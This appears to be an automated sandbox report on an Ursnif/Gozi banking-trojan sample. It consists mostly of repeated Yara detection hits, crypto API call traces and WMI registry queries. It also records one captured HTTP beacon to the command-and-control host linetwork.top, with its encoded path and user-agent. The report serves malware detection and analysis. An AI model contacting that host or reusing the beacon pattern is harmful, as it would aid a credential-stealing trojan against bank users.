                  Source: global trafficHTTP traffic detected: GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
                  Source: Yara matchFile source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
                  Source: Yara matchFile source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                  System Summary

                  barindex
                  Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                  Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
